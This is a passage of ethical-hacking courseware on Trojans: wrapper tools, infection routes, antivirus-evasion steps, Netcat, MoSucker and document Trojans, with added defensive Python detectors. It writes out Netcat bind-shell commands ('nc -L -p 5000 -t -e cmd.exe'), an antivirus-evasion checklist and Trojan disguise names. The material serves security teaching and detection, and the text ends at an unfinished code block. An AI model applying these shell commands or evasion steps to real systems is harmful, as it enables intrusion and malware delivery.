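Overlays are not malicious by themselves (installers and signed binaries carry legitimate trailing data), so the useful signal is an overlay that parses as a complete second executable; a packer such as petite.exe that compresses the whole image is a different case and needs unpacking or behavioural analysis rather than this check.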
Slide: Wrapper Covert Programs. Screenshots of Kriptomatik, Advanced File Joiner, and SCB LAB's - Professional Malware Tool (tabs: Index, Crypter, Binder, Downloader, Spreader).
Wrapper Covert Programs
Kriptomatik is a wrapper covert program that is designed to encrypt and protect files against crackers and antivirus software. It spreads via Bluetooth and allows you to burn CDs/DVDs with Autorun. It has the following features:
Configure icons
Gather files
Posts
Propagation
Other features such as autostart, attributes, encryption, etc.
FIGURE 6.6: Kriptomatik screenshot (file list with File Name, File Path, File Size, Inject To and Extract To fields; plugin count 0006; status: all spread commands unchecked).
Advanced File Joiner
Advanced File Joiner is software that is used to combine and join various files into a single file. If you have downloaded multiple pieces of a large file split into smaller files, you may easily join them together with this tool. For example, you can combine ASCII text files, or combine video files such as MPEG files into a single file, if and only if they are of the same size, format, and encoding. This tool cannot be used effectively for joining file formats that contain header information, such as AVI, BMP, JPEG, and DOC files. So, for each of these file formats, you have to use a join program specific to that format.
FIGURE 6.7: Advanced File Joiner screenshot (tabs: File List, Anti Debugging, Compile, Files, Event Logs, About; file list with Add To File, File Path, and Execute: Yes options).
SCB LAB's - Professional Malware Tool
Professional Malware Tool is designed to encrypt files (crypter), bind files together (binder), download files (downloader), and spread files (spreader).
FIGURE 6.8: SCB LAB's - Professional Malware Tool screenshot (tabs: Index, Crypter, Binder, Downloader, Spreader; file list with Name, Path, and Execute columns; status line: "The attached files weigh 714 KB").
Different Ways a Trojan Can Get into a System
Instant Messenger applications
IRC (Internet Relay Chat)
Physical Access
Legitimate "shrinkwrapped" software packaged by a disgruntled employee
Browser and email software bugs
Attachments
Fake programs
Untrusted sites and freeware software
NetBIOS (FileSharing)
Downloading files, games, and screensavers from Internet sites
Different Ways a Trojan Can Get into a System
Different access points are used by Trojans to infect the victim's system. With the help of these points, the Trojan attacks the target system and takes complete control over the system. They are as follows:
Instant Messenger Applications
The system can get infected via instant messenger applications such as ICQ or Yahoo Messenger. The user is at high risk while receiving files via the messenger, no matter from whom or from where. Since there is no file checking utility bundled with instant messengers, there is always a risk of infection by a Trojan. The user can never be 100% sure who is on the other side of the computer at any particular moment. It could be someone who hacked a messenger ID and password and wants to spread Trojans over the hacked friends list.
IRC (Internet Relay Chat)
IRC is another method used for Trojan propagation. Trojan.exe can be renamed to something like Trojan.txt (with 150 spaces).exe. It can be received over IRC and, in the DCC (Direct Client to Client) transfer, it will appear as .TXT. The execution of such files will cause infection. Most people do not notice that an application (.exe) file has a text icon. So before such things are run, even if it is with a text icon, the extensions must be checked to ascertain that they are really .TXT files.
Do not download any files that appear to be free porn or Internet software. Novice computer users are often targets of these false offers, and many people on IRC are unaware of security. Users get infected from porn-trade channels, as they are not thinking about the risks involved, just how to get free porn and free programs.
Physical Access
Restricting physical access is important for a computer's security. Example:
A user's friend wants to have physical access to his system. The user might sneak into his friend's computer room in his absence and install a Trojan by copying the Trojan software from his disk onto the hard drive.
Autostart is another way to infect a system while having physical access. When a CD is placed in the CD-ROM tray, it automatically starts with a setup interface. An example of the Autorun.inf file that is placed on such CDs:
[autorun]
open=setup.exe
icon=setup.exe
A Trojan could be run easily by running a real setup program.
Since many people do not know about this CD function, their machine might get infected, and they would not understand what happened or how it was done.
The Autostart functionality should be turned off by doing the following:
Start > Settings > Control Panel > System Properties > Settings > Device Manager > CD-ROM
Once there, a reference to Auto Insert Notification will be seen. (It checks approximately once per second whether a CD-ROM has been inserted, changed, or not changed.) To avoid any problems with this function, it should be turned off.
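Turning Auto Insert Notification off is the host-side fix; the complementary check is to read the Autorun.inf on a medium before trusting it and see exactly what would run. The script below is an added example (not courseware code): it parses an Autorun.inf with Python's configparser and lists every directive that launches a program, covering the `open=` form from the text plus the `shellexecute=` and `shell\<verb>\command=` forms that Windows AutoRun also honours. Both .inf bodies are constructed samples.

```python
"""Report what an Autorun.inf would launch when the medium is inserted.

Added example (not CEH courseware). Both .inf bodies are constructed: the
first is the setup.exe example from the text, the second uses the
shellexecute and shell\\<verb>\\command directives that Windows AutoRun also
honours.
"""
import configparser
from typing import List, Tuple

LAUNCH_KEYS = ("open", "shellexecute")   # directives that run a program directly

def autorun_launch_targets(inf_text: str) -> List[Tuple[str, str]]:
    """Return (directive, target) for every directive in [autorun] that starts a program."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.read_string(inf_text)   # configparser lower-cases keys, matching AutoRun's case-insensitivity
    targets: List[Tuple[str, str]] = []
    for section_name in parser.sections():
        if section_name.lower() != "autorun":
            continue
        section = parser[section_name]
        for key in LAUNCH_KEYS:
            if key in section:
                targets.append((key, section[key].strip()))
        for key, value in section.items():
            # shell\<verb>\command=prog.exe registers a context-menu verb that executes prog.exe
            if key.startswith("shell\\") and key.endswith("\\command"):
                targets.append((key, value.strip()))
    return targets

def autorun_is_risky(inf_text: str) -> bool:
    """True if inserting the medium could execute code while Auto Insert Notification is on."""
    return bool(autorun_launch_targets(inf_text))

# Constructed sample 1: the CD Autorun.inf from the text.
SAMPLE_SETUP_CD = """[autorun]
open=setup.exe
icon=setup.exe
"""

# Constructed sample 2: a USB stick that launches through the other two directive forms.
SAMPLE_USB = r"""[AutoRun]
label=Holiday photos
shellexecute=photos\viewer.exe
shell\open\command=photos\viewer.exe
"""

if __name__ == "__main__":
    for name, body in (("cd", SAMPLE_SETUP_CD), ("usb", SAMPLE_USB)):
        print(name, autorun_launch_targets(body))
```

An `icon=` or `label=` line on its own is harmless; it is the presence of any launch directive that makes the medium worth treating as untrusted until the referenced file has been examined.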
Browser and Email Software Bugs
Users do not update their software as often as they should, and many attackers take advantage of this well-known fact. Imagine an old version of Internet Explorer being used. A visit to a malicious site will automatically infect the machine without downloading or executing any program. The same scenario occurs while checking email with Outlook Express or some other software with well-known problems. Again, the user's system will be infected without even downloading an attachment. The latest version of the browser and email software should be used, because it reduces the risk from these bugs.
Check the following sites to understand how dangerous these bugs are, all due to the use of an old version of the software:
http://www.guninski.com/browsers.html
http://www.guninski.com/netscape.html
Fake Programs
Attackers can easily lure a victim into downloading free programs that are suitable for their needs and loaded with features such as an address book, access to check several POP3 accounts, and many other functions that make it even better than the currently used email client.
The victim downloads the program and marks it as TRUSTED, so that the protection software fails to alert him or her about the new software being used. The email and POP3 account passwords are mailed directly to the attacker's mailbox without anyone noticing. Cached passwords and keystrokes can also be mailed. The aim is to gather ample information and send it to the attacker.
In some cases, an attacker may have complete access to a system, but what the attacker does depends on his or her ideas about how to use the hidden program's functions. Since the program already uses port 25 for sending email and port 110 for POP3, these ports could be used for connections from the attacker's machine (not from home, of course, but from another hacked machine) to connect and use the hidden functions implemented in the freeware program. The idea here is to offer a program that requires a connection with a server to be established.
Attackers thrive on creativity. Consider an example where a fake Audiogalaxy site, which is a site for downloading MP3s, is set up. An attacker generates such a site by using 15 GB of space on his system to place a large MP3 archive there. In addition, some other systems are also configured in the same fashion. This is done to fool users into thinking that they are downloading from other people who are spread across the network. The software acts as a backdoor and will infect thousands of naive users using ADSL connections.
Some fake programs have hidden code but still maintain a professional look. These websites link to anti-Trojan software, thus fooling users into trusting them. Included in the setup is a readme.txt. This can deceive almost any user, so proper attention needs to be given to any freeware before it is downloaded. This is important because this dangerous method is an easy way to infect a machine via Trojans hidden in the freeware.
Shrink-Wrapped Software
Legitimate "shrink-wrapped" software packaged by a disgruntled employee can contain Trojans.
Via Attachments
When unaware web users receive an email saying they will get free porn or free Internet access if they run an attached .exe file, they might run it without completely understanding the risk to their machines. Example:
A user has a good friend who is carrying out some research, and wants to know about a topic related to his friend's field of research. He sends an email to his friend asking about the topic and waits for a reply. The attacker targeting the user also knows his friend's email address. The attacker will simply code a program to fake the email From: field and make it appear to be the friend's email address, but it will include the Trojaned attachment. The user will check his email, see that his friend has answered his query in an attachment, and download and run it without thinking that it might be a Trojan. The end result is an infection.
Trash email with the subject line "Microsoft IE Update" without viewing it.
Some email clients, such as Outlook Express, have bugs that automatically execute the attached files.
Untrusted Sites and Freeware Software
A site located at a free web space provider, or one just offering programs for illegal activities, can be considered suspicious.
There are many underground sites such as NeuroticKat Software. It is highly risky to download any program or tool located on such a suspicious site, as it can serve as a conduit for a Trojan attack on a victim's computer. No matter what software you use, are you ready to take that risk?
Many sites are available that have a professional look and contain huge archives. These sites are full of feedback forms and links to other popular sites. Users must take the time to scan such files before downloading them, so that it can be determined whether or not they are coming from a genuine site or a suspicious one.
Software such as mIRC, ICQ, PGP, or any other popular software must be downloaded from its original (or official dedicated mirror) site, and not from any other websites that may have links to download supposedly the same software.
Webmasters of well-known security portals, who have vast archives with various "hacking" programs, should be responsible for the files they provide and scan them often with anti-virus and anti-Trojan software to guarantee the site to be "free of Trojans and viruses." Suppose an attacker submits a program infected with a Trojan, e.g., a UDP flooder, to the webmaster for the archive; if the webmaster is not alert, the attacker may use the webmaster's irresponsibility to infect the site's files with a Trojan.
Users who deal with any kind of software or web application should scan their systems on a daily basis. If they detect any new file, it should be examined. If any suspicion arises regarding the file, it must be forwarded to software detection labs for further analysis.
It is easy to infect machines using freeware programs. "Free is not always the best," and hence these programs are hazardous for systems.
NetBIOS (File Sharing)
If port 139 on the system is open, i.e., file sharing is enabled, it can be used by others to access the system, install trojan.exe, and modify a system's files.
The attacker can also use a DoS attack to shut down the system and force a reboot, so the Trojan can restart itself immediately. To block file sharing in the WinME version, go to:
Start > Settings > Control Panel > Network > File and Print Sharing
Uncheck the boxes there. This will prevent NetBIOS abuse.
Downloading files, games, and screensavers from Internet sites can be dangerous.
How to Deploy a Trojan
Major Trojan Attack Paths:
User clicks on the malicious link
User opens malicious email attachments
Slide diagram: the attacker sends the victim an email containing a link to a Trojan server (Russia); the Trojan is sent to the victim, and the attacker installs the Trojan, infecting the victim's machine.
How to Deploy a Trojan
A Trojan is the means by which an attacker can gain access to the victim's system. In order to gain control over the victim's machine, an attacker creates a Trojan server and then sends an email to a victim containing a link to the Trojan server. Once the victim clicks on the link sent by the attacker, it connects him or her directly to the Trojan server. The Trojan server sends a Trojan to the victim's system. The attacker installs the Trojan, infecting the victim's machine. As a result, the victim is connected to the attack server unknowingly.
Once the victim connects to an attacker's server, the attacker takes complete control over the victim's system and performs any action the attacker chooses. If the victim carries out any online transaction or purchase, then the attacker can easily steal sensitive information such as credit card details, account information, etc. In addition, attackers can also use the victim's machine as the source for launching attacks on other systems.
Computers typically get infected by users clicking on a malicious link or opening an email attachment that installs a Trojan on their computers, which serves as a back door to criminals who can then command the computer to send spam email.
FIGURE 6.9: Diagrammatical representation of deploying a Trojan in the victim's system. The figure shows a phishing email styled as an Apple Store order notice containing a link to the Trojan server; the victim's click immediately connects to the Trojan server in Russia, the Trojan is sent to the victim, the attacker installs the Trojan, infecting the machine, and the Trojan then connects back to the attack server over the Internet.
Evading Anti-Virus Techniques
Break the Trojan file into multiple pieces and zip them as a single file
Never use Trojans downloaded from the web (antivirus can detect these easily)
ALWAYS write your own Trojan and embed it into an application
Change the content of the Trojan using a hex editor, and also change the checksum and encrypt the file
Change the Trojan's syntax:
Convert an EXE to VB script
Change the .EXE extension to .DOC.EXE, .PPT.EXE or .PDF.EXE (Windows hides "known extensions" by default, so only .DOC, .PPT and .PDF show up)
Evading Antivirus Techniques
The following are the various techniques used by Trojans, viruses, and worms to evade most antivirus software:
1. Never use Trojans downloaded from the web (antivirus detects these easily).
2. Write your own Trojan and embed it into an application.
3. Change the Trojan's syntax:
Convert an EXE to VB script
Convert an EXE to a DOC file
Convert an EXE to a PPT file
4. Change the checksum.
5. Change the content of the Trojan using a hex editor.
6. Break the Trojan file into multiple pieces.
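Two of the disguises described in this module work purely on the file name: the IRC trick of naming a file "Trojan.txt (with 150 spaces).exe" so the real extension scrolls out of view, and the .DOC.EXE / .PPT.EXE / .PDF.EXE double extension that Explorer shows as .DOC, .PPT or .PDF when known extensions are hidden. The script below is an added example that serves both passages (it is not courseware code): it checks a file name for padding and for a document-looking inner extension in front of an executable one, so a mail gateway, download folder scan, or DCC receive hook can flag such names. The sample names are constructed.

```python
"""Flag file names engineered to hide an executable extension.

Added example (not CEH courseware). It covers the two tricks the module
describes: padding such as "Trojan.txt<150 spaces>.exe" so the real extension
scrolls out of view, and a double extension such as invoice.pdf.exe that
Explorer shows as invoice.pdf when known extensions are hidden. The sample
names are constructed.
"""
import os
from typing import Dict, List

EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs", ".js"}
DOCUMENT_EXTS = {".txt", ".doc", ".ppt", ".pdf", ".jpg", ".gif", ".xls", ".mp3", ".avi"}

def deceptive_name_reasons(filename: str) -> List[str]:
    """Return the reasons a name looks designed to disguise an executable (empty if none)."""
    reasons: List[str] = []
    name = os.path.basename(filename.replace("\\", "/"))
    root, ext = os.path.splitext(name)
    ext = ext.lower()
    if ext not in EXECUTABLE_EXTS:
        return reasons                       # only executable types can be disguised this way
    stripped = root.rstrip(" ")
    padding = len(root) - len(stripped)
    if padding >= 5:
        reasons.append(f"{padding} spaces pad the name so the {ext} extension scrolls out of view")
    inner_ext = os.path.splitext(stripped)[1].lower()
    if inner_ext in DOCUMENT_EXTS:
        reasons.append(f"double extension: displayed as '{stripped}' when known extensions are hidden")
    return reasons

def scan_names(names: List[str]) -> Dict[str, List[str]]:
    """Map each suspicious name to its reasons; clean names are omitted."""
    flagged: Dict[str, List[str]] = {}
    for name in names:
        reasons = deceptive_name_reasons(name)
        if reasons:
            flagged[name] = reasons
    return flagged

# Constructed sample: an IRC/DCC-style padded name, two double extensions, and two honest names.
SAMPLE_NAMES = [
    "Trojan.txt" + " " * 150 + ".exe",
    "invoice.PDF.exe",
    "holiday.jpg.scr",
    "slides.ppt",
    "setup.exe",
]

if __name__ == "__main__":
    for name, reasons in scan_names(SAMPLE_NAMES).items():
        print(repr(name[:20]), "->", "; ".join(reasons))
```

The check is deliberately name-only: it costs nothing and catches the cases above, but a renamed executable with a plain name passes it, so it belongs in front of content inspection (file type by header bytes), not in place of it.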
So far, we have discussed various concepts of Trojans and the way they infect the system. Now we will discuss various types of Trojans that are used by attackers for gaining sensitive information through various means.
Module flow: Trojan Concepts, Trojans Infection, Types of Trojans, Trojan Detection, Countermeasures, Anti-Trojan Software, Penetration Testing
This section covers various types of Trojans such as command-shell Trojans, document Trojans, email Trojans, botnet Trojans, proxy server Trojans, and so on.
Types of Trojans
Slide diagram: VNC Trojan, HTTP/HTTPS Trojan, ICMP Trojan, Data Hiding Trojan, Destructive Trojan, Document Trojan, and others.
Types of Trojans
Various types of Trojans that are intended for various purposes are available. The following is a list of types of Trojans:
VNC Trojan
Proxy Server Trojan
HTTP/HTTPS Trojan
Botnet Trojan
ICMP Trojan
Covert Channel Trojan
Command Shell Trojan
SPAM Trojan
Data Hiding Trojan
Credit Card Trojan
Destructive Trojan
Defacement Trojan
Document Trojan
E-banking Trojan
GUI Trojan
Notification Trojan
FTP Trojan
Mobile Trojan
E-mail Trojan
MAC OS X Trojan
Remote Access Trojan
Command Shell Trojans
Command shell Trojan gives remote control of a command shell on a victim's machine
Trojan server is installed on the victim's machine, which opens a port for the attacker to connect. The client is installed on the attacker's machine, which is used to launch a command shell on the victim's machine
Command Shell Trojans
The command shell Trojan gives remote control of a command shell on a victim's machine. The Trojan server is installed on the victim's machine, which opens a port for the attacker to connect. The client is installed on the attacker's machine, which is used to launch a command shell on the victim's machine.
C:\>nc
C:\>nc -L -p -t -e cmd.exe
FIGURE 6.10: Attacker launching command shell Trojan in victim's machine
Command Shell Trojan: Netcat

Using Netcat, an attacker can set up a port or a backdoor that allows him or her to telnet into a DOS shell. With a simple command such as C:\>nc -L -p 5000 -t -e cmd.exe, the attacker binds port 5000. With Netcat, the user can create outbound or inbound connections, TCP or UDP, to or from any port. It provides full DNS forward/reverse checking, with appropriate warnings. Additionally, it can use any local source port and any locally configured network source address, and it comes with built-in port-scanning capabilities. It has a built-in loose source-routing capability and can read command-line arguments from standard input. Another feature is the ability to let another program respond to inbound connections (another program services the established connections).

In the simplest usage, "nc host port" creates a TCP connection to the given port on the given target host. Standard input is then sent to the host, and anything that comes back across the connection is sent to standard output. This continues indefinitely, until the network side of the connection shuts down. This behavior differs from most other applications, which shut everything down and exit after an end-of-file on standard input. Netcat can also function as a server by listening for inbound connections on arbitrary ports and then doing the same reading and writing. With minor limitations, Netcat does not really care whether it runs in client or server mode; it still moves data back and forth until there is none left. In either mode, shutdown can be forced after a configurable time of inactivity on the network side.
Features:

- Outbound or inbound connections, TCP or UDP, to or from any port
- Full DNS forward/reverse checking, with appropriate warnings
- Ability to use any local source port
- Ability to use any locally configured network source address
- Built-in port-scanning capabilities, with randomizer
- Built-in loose source-routing capability
- Can read command-line arguments from standard input
- Slow-send mode, one line every N seconds
- Hex dump of transmitted and received data
- Optional ability to let another program service established connections
- Optional telnet-options responder, using the command nc -l -p 23 -t -e cmd.exe, where 23 is the telnet port, the -l option is to listen, the -e option is to execute, and the -t option tells Netcat to handle any telnet negotiation the client might expect
Netcat is a utility for reading from and writing to network connections over the TCP and UDP protocols. Used as a Trojan, it opens a TCP or UDP port on the target system, through which hackers, with the help of Telnet, gain access to the system.

Command Prompt

    C:\>nc.exe -h
    [v1.10 NT]
    connect to somewhere:   nc [-options] hostname port[s] [ports] ...
    listen for inbound:     nc -l -p port [options] [hostname] [port]
    options:
            -d              detach from console, stealth mode
            -e prog         inbound program to exec [dangerous!!]
            -g gateway      source-routing hop point[s], up to 8
            -G num          source-routing pointer: 4, 8, 12, ...
            -h              this cruft
            -i secs         delay interval for lines sent, ports scanned
            -l              listen mode, for inbound connects
            -L              listen harder, re-listen on socket close
            -n              numeric-only IP addresses, no DNS
            -o file         hex dump of traffic
            -p port         local port number
            -r              randomize local and remote ports
            -s addr         local source address
            -t              answer TELNET negotiation
            -u              UDP mode
            -v              verbose [use twice to be more verbose]
            -w secs         timeout for connects and final net reads
            -z              zero-I/O mode [used for scanning]
    port numbers can be individual or ranges: m-n [inclusive]
    C:\>

FIGURE 6.11: Netcat screenshot
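The defender's counterpart to the listener described above is to look for it. The following is an added example, not code from the CEH courseware or from Netcat: it joins the LISTENING rows of a Windows "netstat -ano" listing with the owning process's image name and command line (as a responder would collect with "wmic process get ProcessId,Name,CommandLine") and flags listeners that are a Netcat binary, that hand inbound connections to a shell through -e/-c, or that sit on a port the host is not expected to serve. Both samples, the process table and the expected-listener set are constructed for the example.

```python
"""Flag suspicious listening sockets such as a Netcat bind shell.

Added example (not part of the CEH courseware). It joins the LISTENING
rows of `netstat -ano` with the owning process's image name and command
line and flags listeners that look like `nc -L -p <port> -e cmd.exe`.
All sample data below is constructed, not captured from a real host.
"""
import re
from dataclasses import dataclass

# Constructed sample in the shape `netstat -ano` prints on Windows.
NETSTAT_SAMPLE = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       880
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5000           0.0.0.0:0              LISTENING       3612
  TCP    192.168.1.20:49731     52.96.1.1:443          ESTABLISHED     2240
  TCP    0.0.0.0:4288           0.0.0.0:0              LISTENING       4120
"""

# Constructed sample: PID -> (image name, command line), as collected with
# `wmic process get ProcessId,Name,CommandLine` on the same host.
PROCESS_SAMPLE = {
    880: ("svchost.exe", r"C:\Windows\system32\svchost.exe -k RPCSS"),
    4: ("System", ""),
    3612: ("nc.exe", r"C:\Temp\nc.exe -L -p 5000 -t -e cmd.exe"),
    2240: ("outlook.exe", r"C:\Program Files\Microsoft Office\OUTLOOK.EXE"),
    4120: ("msnetcfg.exe", r"C:\Windows\msnetcfg.exe"),
}

# Ports this hypothetical host is expected to listen on (assumed baseline).
EXPECTED_LISTENERS = {135, 445}
NETCAT_IMAGES = {"nc.exe", "nc64.exe", "ncat.exe", "netcat.exe"}
# `-e prog` / `-c cmd` hand the connection to a program: Netcat's "dangerous!!" option.
EXEC_FLAG = re.compile(r"(?:^|\s)-[eEc]\s+\S*(cmd|powershell|sh)\b", re.IGNORECASE)


@dataclass
class Finding:
    port: int
    pid: int
    image: str
    reasons: tuple


def parse_listeners(netstat_text):
    """Return (port, pid) for every TCP LISTENING row of `netstat -ano` output."""
    rows = []
    for line in netstat_text.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[0] == "TCP" and parts[3] == "LISTENING":
            port = int(parts[1].rsplit(":", 1)[1])
            rows.append((port, int(parts[4])))
    return rows


def find_suspicious_listeners(netstat_text, processes, expected=EXPECTED_LISTENERS):
    """Join listeners with their process and return the ones worth a look."""
    findings = []
    for port, pid in parse_listeners(netstat_text):
        image, cmdline = processes.get(pid, ("<unknown>", ""))
        reasons = []
        if image.lower() in NETCAT_IMAGES:
            reasons.append("netcat binary is listening")
        if EXEC_FLAG.search(cmdline):
            reasons.append("listener hands connections to a shell (-e/-c)")
        if port not in expected:
            reasons.append("port not in expected listener set")
        if reasons:
            findings.append(Finding(port, pid, image, tuple(reasons)))
    return findings


if __name__ == "__main__":
    for f in find_suspicious_listeners(NETSTAT_SAMPLE, PROCESS_SAMPLE):
        print(f"port {f.port} pid {f.pid} {f.image}: {'; '.join(f.reasons)}")
```

The port allowlist is what turns this from a Netcat-name check into something general: a renamed binary (the MoSucker server names listed later in this module are chosen to look like system files) still shows up because it listens where nothing should.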
GUI Trojan: MoSucker

Source: http://www.dark-e.com

MoSucker is a Visual Basic Trojan. MoSucker's edit-server program lets the infection routine be changed and notification information be set. MoSucker can auto-load from system.ini and/or the registry; unlike any other Trojan, it can be set to choose the auto-load method at random. It can notify cell phones via SMS (in Germany only). MoSucker's edit server can grow the server by X kilobytes (X is either a static number or a random value each time). The standard error message for MoSucker is "Zip file is damaged, truncated, or has been changed since it was created. If you downloaded this file, try downloading again." MoSucker suggests the following file names for the server: MSNETCFG.exe, unin0686.exe, Calc.exe, HTTP.exe, MSWINUPD.exe, Ars.exe, NETUPDATE.exe, and Register.exe.

Server features:

- Chat with victim
- Clipboard manager
- Close/remove server
- Control mouse
- Crash system
- File manager
- Get passwords entered by user, system info
- Hide/show start button, system tray, taskbar
- Keylogger
- Minimize all windows
- Open/close CD-ROM drive
- Ping server
- Pop-up start menu
- Process manager
- Shutdown/Reboot/Standby/Logoff/DOS mode server
- System keys on/off
- Window manager
FIGURE 6.12: MoSucker screenshot (MoSucker 3.0 client window with the tabs Misc stuff, Information, File related, System, Spy related, Fun stuff I, Fun stuff II and Live capture)
FIGURE 6.13: MoSucker showing victim's name and connection port (MoSucker 3.0 edit-server dialog with the tabs Name/Port, Password, Autostart, Notification 1, Notification 2, Options, Events, Bind Files, Keylogger, Plug-ins/Kill, Fake Error, File Properties and Icons; fields for Server ID, Cypher Key, Victim's Name, Server Name(s), Extension(s) and Connection-port (4288); the option "Prevent same server multi-infections (recommended)"; and Read, Save and Exit buttons)
GUI Trojan: Jumper and Biodox

Jumper is a malicious program that performs many functions to download further malware from the Internet. Attackers use the Jumper Trojan to get sensitive data, such as financial information, from the user's system. It also downloads additional components that allow the attacker to access the system remotely. Normally the BIODOX OE Edition.exe file should be in the C:\Windows\System32 folder; if it is found elsewhere, it is a Trojan. Once the computer is infected by Biodox, system performance decreases and the screensaver changes automatically. Continuous annoying advertisement pop-ups appearing on the computer can be treated as another symptom of this Trojan.
FIGURE 6.13: Screenshots showing Biodox and Jumper (the Biodox Open Source window lists the running processes with their PIDs, status, memory size and priority, with a Clear Application List button)
Document Trojans

Most users tend to update their operating system but not the applications they use regularly. Attackers take this opportunity to install document Trojans. They usually embed a Trojan in a document and deliver it as an e-mail attachment, an office document, a web page, or a media file such as Flash or PDF. When the user opens the document with the embedded Trojan, assuming it is legitimate, the Trojan is installed on the victim's machine; it does so by exploiting the application used to open the document. Attackers can then access sensitive data and perform malicious actions.
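Because a modern Word document is a ZIP container, a defender can look inside one without opening it in Word. The following is an added example, not code from the CEH courseware: it lists the archive members that carry executable or embedded content (a VBA project, embedded OLE objects such as the "package" icon in the FedEx letter below, ActiveX controls) and scans the relationship parts for OLE/package relationships and external targets. The two documents it builds are constructed in memory and are not real attachments; the member paths and relationship types are the standard OOXML ones.

```python
"""Triage a Word document for embedded payloads before anyone opens it.

Added example, not part of the CEH courseware. A .docx is a ZIP container,
so it can be inspected without launching Word: this flags VBA macro
projects, embedded OLE objects, ActiveX controls, and relationships that
pull in OLE objects or external targets. The documents built below are
constructed in memory; they are not real phishing attachments.
"""
import io
import re
import zipfile

# Archive members that carry executable or embedded content.
MEMBER_RULES = (
    (re.compile(r"^word/vbaProject\.bin$"), "VBA macro project"),
    (re.compile(r"^word/embeddings/"), "embedded OLE object/package"),
    (re.compile(r"^word/activeX/"), "ActiveX control"),
)
OLE_REL_KINDS = ("/relationships/oleObject", "/relationships/package")
OOXML_NS = "http://schemas.openxmlformats.org/officeDocument/2006"


def triage_docx(data):
    """Return sorted (member, reason) findings for a .docx given as bytes."""
    if not zipfile.is_zipfile(io.BytesIO(data)):
        # Legacy binary .doc files are OLE compound files, not ZIPs; they need an OLE parser.
        return [("<file>", "not an OOXML container; inspect as legacy OLE document")]
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            for pattern, reason in MEMBER_RULES:
                if pattern.search(name):
                    findings.append((name, reason))
            if name.endswith(".rels"):
                findings.extend(_scan_relationships(name, zf.read(name).decode("utf-8", "replace")))
    return sorted(findings)


def _scan_relationships(member, xml):
    """Flag OLE/package relationships and any TargetMode="External" link in a .rels part."""
    out = []
    for elem in re.findall(r"<Relationship\b[^>]*/>", xml):
        rtype = re.search(r'Type="([^"]+)"', elem)
        target = re.search(r'Target="([^"]+)"', elem)
        mode = re.search(r'TargetMode="([^"]+)"', elem)
        if not (rtype and target):
            continue
        if rtype.group(1).endswith(OLE_REL_KINDS):
            kind = rtype.group(1).rsplit("/", 1)[1]
            out.append((member, f"{kind} relationship -> {target.group(1)}"))
        elif mode and mode.group(1) == "External":
            out.append((member, f"external target {target.group(1)}"))
    return out


def _build_docx(extra_members, rels):
    """Constructed minimal .docx: fixed parts plus whatever the caller adds."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document>Dear Mr. Stevens, see the attached package.</w:document>")
        zf.writestr("word/_rels/document.xml.rels", "<Relationships>" + "".join(rels) + "</Relationships>")
        for name, content in extra_members.items():
            zf.writestr(name, content)
    return buf.getvalue()


def build_phishing_sample():
    """Constructed lookalike of the letter in Figure 6.14: one OLE package and one external link."""
    return _build_docx(
        # OLE compound-file magic bytes plus filler; constructed, not a real object.
        {"word/embeddings/oleObject1.bin": b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24},
        [
            f'<Relationship Id="rId1" Type="{OOXML_NS}/relationships/oleObject" Target="embeddings/oleObject1.bin"/>',
            f'<Relationship Id="rId2" Type="{OOXML_NS}/relationships/hyperlink" Target="http://tracking.example/package" TargetMode="External"/>',
            f'<Relationship Id="rId3" Type="{OOXML_NS}/relationships/styles" Target="styles.xml"/>',
        ],
    )


def build_clean_sample():
    """Constructed ordinary document with only an internal styles relationship."""
    return _build_docx({}, [f'<Relationship Id="rId1" Type="{OOXML_NS}/relationships/styles" Target="styles.xml"/>'])


if __name__ == "__main__":
    for member, reason in triage_docx(build_phishing_sample()):
        print(f"{member}: {reason}")
```

A finding here is a reason to detonate the file in a sandbox or hand it to a mail gateway rule, not proof of infection: legitimate documents embed spreadsheets and link to websites too. The point of the check is that the evidence is in the container itself, so it can be gathered before the vulnerable application ever parses the document.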
FIGURE 6.13: Attacker infecting victim's machine using Document Trojan (diagram: the attacker embeds a Trojan into a Word document and infects the victim's computer; the Trojan is executed as the victim opens the document and clicks on the Trojan package)
An example of a Trojan embedded in a Word document is as follows:

VIA LETTER
John Stevens
Royal Communications Company
445 152th Street S.W.
Washington, DC 20554

FecEx, September 2, 2012

RE: Fedex Shipment Airway Bill Number: 867676340056

Dear Mr. Stevens:

We have received a package addressed to you at the value of USD 2,300. The custom duty has not been paid for this shipment, which is listed as Apple iMac 24" Computer. Please call us at Fedex at 1800-234-446 Ext 345 or e-mail me at m.roberts@fedex.com regarding this shipment. Please visit our Fedex Package Tracking website to see more details about this shipment and advise us on how to proceed. The website link is attached with this letter.

[Package: Trojan embedded in Word document]

Sincerely,
Michelle Roberts
Customer Service Representative
International Shipment and Handling
Fedex Atlanta Division
Tel: 1800-234-446 Ext 345
http://www.fedex.com
m.roberts@fedex.com
FIGURE 6.14: An example of Trojan embedded in a Word document
E-mail Trojans

- The attacker gains remote control of a victim computer by sending e-mail messages
- Attackers can then retrieve files or folders by sending commands through e-mail
- The attacker uses an open-relay SMTP server and fakes the e-mail's FROM field to hide the origin
Email Trojans spread through bulk e-mails. The Trojan is sent as an attachment; the moment the user opens the e-mail, the virus enters the system, spreads, and causes a lot of damage to the data on the system. It is always recommended that users not open e-mails from unknown senders. Sometimes e-mail Trojans even generate automatic mail and send it to all the contacts present in the victim's address book, so they spread through the infected victim's contact list. Attackers send instructions to the victim through e-mail; when the victim opens the e-mail, the instructions are executed automatically. Thus attackers can retrieve files or folders by sending commands through e-mail. The following figure explains how an attack can be performed using e-mail Trojans.
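The traits listed on the slide (a faked FROM field, an open relay, commands and files moving as attachments) leave marks in the message itself. The following is an added example, not code from the CEH courseware: it parses a raw message with Python's standard e-mail library and reports a From domain that differs from the envelope sender in Return-Path, a Reply-To that points elsewhere, a first relay hop with no reverse DNS name (the usual shape of mail injected through an open relay), and executable attachments. The message is constructed for the example; its addresses, hosts and IPs are documentation values.

```python
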